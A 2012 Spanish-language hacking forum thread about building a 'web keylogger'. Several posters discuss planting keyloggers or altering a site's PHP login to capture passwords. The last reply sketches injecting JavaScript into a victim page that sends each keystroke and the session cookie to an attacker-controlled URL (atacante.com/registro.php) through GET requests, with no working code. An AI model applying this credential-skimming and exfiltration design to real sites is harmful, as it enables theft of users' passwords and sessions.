|
Título: ¿Keylogger web? Publicado por: DelArteOscuro en 22 Marzo 2012, 01:41 am Buenas noches,
Estoy buscando alguna web (o almenos cómo hacerla, pero es simple así que espero que ya exista)... en la que, de forma similar a la que hace un keylogger, se escriba en una ventana de texto todo lo que se escriba en otra ventana abierta del navegador. Es decir: 2 ventanas del navegador de internet abiertas (preferiblemente Mozilla Firefox) una con la web que busco y en la otra escribo lo que sea; entonces en la web que busco debería aparecer lo que he escrito en la otra... Entonces, lo que sería un keylogger web, pero no me es necesario que guarde el texto en ningún archivo ni nada. Si alguien me resuelve esta duda, le estaré muy agradecido!! Muchas gracias!! Título: Re: ¿Keylogger web? Publicado por: #!drvy en 22 Marzo 2012, 02:04 am Necesitaras acceso a ambas paginas web. Con acceso me refiero a algún medio para poder modificar y/o crear nuevos archivos.. ya se mediante ftp.. webftp o algúna vulnerabilidad.
Luego es simplemente crear una función que envié cada tecla pulsada a un archivo y que se archivo lo lea la otra pagina.. Saludos Título: Re: ¿Keylogger web? Publicado por: Spider-Net en 22 Marzo 2012, 15:36 pm Detección de teclas por javascript que se envíen a otra ventana? Yo dudo mucho que por motivos de seguridad eso sea posible.
Título: Re: ¿Keylogger web? Publicado por: [u]nsigned en 22 Marzo 2012, 22:32 pm Detección de teclas por javascript que se envíen a otra ventana? Yo dudo mucho que por motivos de seguridad eso sea posible. Es imposible, de hecho una pagina web es el peor lugar para poner un keylogger xD Título: Re: ¿Keylogger web? Publicado por: Graphixx en 23 Marzo 2012, 01:54 am Mas que un keylogger lo que ese usuario debe andar buscando es un XPLOIT, o hacer una fake web como las de phishing. si no que debe desconocer de esas tecnicas, por eso busca aplicar un KEY en la web.
Título: Re: ¿Keylogger web? Publicado por: darg94 en 23 Agosto 2012, 16:26 pm http://www.youtube.com/watch?v=7NEgFeC17mg
Título: Re: ¿Keylogger web? Publicado por: Luna71c0 en 23 Agosto 2012, 17:57 pm y la veo Muy dificil y muy inutil, sinceramente no le encuentro sentido
mas facil es un keylogger de escritorio Título: Re: ¿Keylogger web? Publicado por: HdM en 23 Agosto 2012, 18:21 pm Citar la veo Muy dificil y muy inutil, sinceramente no le encuentro sentido Échale un vistazo a esto: http://blogs.eset-la.com/laboratorio/2012/07/17/capturando-contrasenas-sitios-web/ (http://blogs.eset-la.com/laboratorio/2012/07/17/capturando-contrasenas-sitios-web/) Saludos. Título: Re: ¿Keylogger web? Publicado por: Luna71c0 en 23 Agosto 2012, 19:10 pm Échale un vistazo a esto: http://blogs.eset-la.com/laboratorio/2012/07/17/capturando-contrasenas-sitios-web/ (http://blogs.eset-la.com/laboratorio/2012/07/17/capturando-contrasenas-sitios-web/) como desarrollo web no veo el aplicativoSaludos. con malas intenciones es algo interesante, el inconveniente es que es necesario entrar si o si a una pagina, y en ese caso la pagina deberia ser con un dominio no propio pagina.hosting.com y todo rellenado con campos aleatoreos lo cual hace una desconfianza muy grande y bueno tener en cuenta que hay muchos hosting que almacenan tus ip's deberia contarse con un programa para cambiar la ip que los mas efectivos a veces son pagos... reitero no le encuentro sentido, prefiero plantar un keylogger y listo xD Título: Re: ¿Keylogger web? Publicado por: HdM en 23 Agosto 2012, 19:22 pm Hola.
Citar el inconveniente es que es necesario entrar si o si a una pagina, y en ese caso la pagina deberia ser con un dominio no propio pagina.hosting.com y todo rellenado con campos aleatoreos lo cual hace una desconfianza muy grande No entiendo. La idea (no la del post, imagino :xD, sino la del artículo enlazado) es colarlo en un servidor legítimo, para robo de credenciales; como alternativa a phising. Saludos. Título: Re: ¿Keylogger web? Publicado por: Luna71c0 en 23 Agosto 2012, 19:42 pm Hola. por eso mismo, te llevaria muchos problemas legales :PNo entiendo. La idea (no la del post, imagino :xD, sino la del artículo enlazado) es colarlo en un servidor legítimo, para robo de credenciales; como alternativa a phising. Saludos. Título: Re: ¿Keylogger web? Publicado por: USLO en 24 Agosto 2012, 11:09 am No lo entinedo referente al enlace que nos has mandado no entinedo esto!
Código: De esta forma, con que un ciberdelincuente pueda inyectar el código en un sitio web, sería capaz de obtener credenciales. Que alguine me explique esto de inyectar en un sitio WEB. Osea cojes el sitio WEB de otro y le mtes tu JS? No le veo sentido. No lo veo plausible en la mayoria de los casos. Si me equivoco , aclararmelo que me interesa este tema. >:D Saludos Título: Re: ¿Keylogger web? Publicado por: #!drvy en 24 Agosto 2012, 11:27 am Citar Que alguine me explique esto de inyectar en un sitio WEB. Exacto, el atacante debe tener acceso al servidor.. ya sea mediante una vulnerabilidad o cualquier otra cosa... con tal de que pueda inyectar una linea de js le sirve..Osea cojes el sitio WEB de otro y le mtes tu JS? Citar reitero no le encuentro sentido, prefiero plantar un keylogger y listo xD El keylogger tambien te lleva a muchos problemas legales =) y ademas si plantas un keylogger en una web... te llevas credenciales de usuarios que nunca has llegado a conocer...Claro que esto de hacer un keylogger en javascript es un rollo... si tienes acceso a los archivos (te vale con el de login) puedes modificar el PHP para que te almacene las claves y así todo es un poco mas "invisible" para la victima.. Saludos Título: Re: ¿Keylogger web? Publicado por: h3ct0r en 24 Agosto 2012, 22:44 pm Creo que si se podría, en realidad suena bastante interesante como un POC.
Bueno en lineas generales creo que podrías hacerlo de la siguiente manera, no lo he probado así que puedo estar equivocado: En teoría tendrías 2 sitios, http://www.victima.com/index.php y http://www.atacante.com . Si tienes privilegios para escribir un archivo, puedes editar index.php en la pagina victima e insertar un javascript malicioso que haga lo siguiente: Leer cada tecla pulsada por el teclado + la cookie y crear en cada keypress una imagen en el dom o un iframe que apunte hacia http://www.atacante.com/registro.php?cookie=123&keypress=E&dominio=victima.com (le pasas los datos que robas a través de una petición get y así haces bypass del filtro de seguridad de los navegadores). Luego cada vez que registro.php reciba una peticion get, colocas esa información en una base de datos para luego trabajarlas y mostrarlas todas juntas por dominio y cookie (así sabes que las teclas pulsadas son de una persona en especifico de un sitio en especifico, ademas de que te permite loguearte después, tanto con la contraseña que saques, como por la cookie robada). Esta bastante interesante la idea, si tuviera un poco mas de tiempo me gustaría desarrollarla por que le veo mucho potencial. ;D Por ahi hay un proyecto de javascript y perl que trojaniza por completo el navegador del usuario pero ahora no me acuerdo del nombre! |